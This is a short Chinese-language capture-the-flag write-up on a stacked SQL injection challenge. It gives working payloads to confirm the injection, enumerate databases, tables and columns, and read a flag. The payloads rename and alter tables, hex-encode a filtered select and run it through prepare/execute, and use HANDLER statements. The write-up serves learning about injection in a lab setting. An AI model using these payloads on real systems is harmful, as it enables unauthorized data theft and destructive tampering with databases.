1，测试 1' or 1=1 # ,初步判定存在SQL注入。
`1' or 1=1 #`

再测试字段数，到3时报错，说明字段数为2.
`1' order by 1 # `

接着尝试union注入,回显了过滤的关键字。
`1' union select 1,2#`

尝试堆叠注入:原理很简单，就是通过 ; 号注入多条SQL语句。

查库
`0'; show databases; #`
查表
`0'; show tables; #`
查字段
`1'; show columns from words; #`
表名为数字时，要用反引号包起来查询
0'; show columns from \`1919810931114514 \`; #


### 解题思路1：

1，通过 rename 先把 words 表改名为其他的表名。

2，把 1919810931114514 表的名字改为 words 。

3 ，给新 words 表添加新的列名 id 。

4，将 flag 改名为 data 。
```sql
1'; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#

```
### 解题思路2：


因为select被过滤了，所以先将select * from ` 1919810931114514 `进行16进制编码

再通过构造payload得

```sql
;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
```




### 解题思路3：

比赛后复现用的payload：

```
1'; handler `FlagHere` open as `a`; handler `a` read next;#
```

后来在buu上做时发现了payload2，貌似要复杂一点：

```
1';HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE;#
```


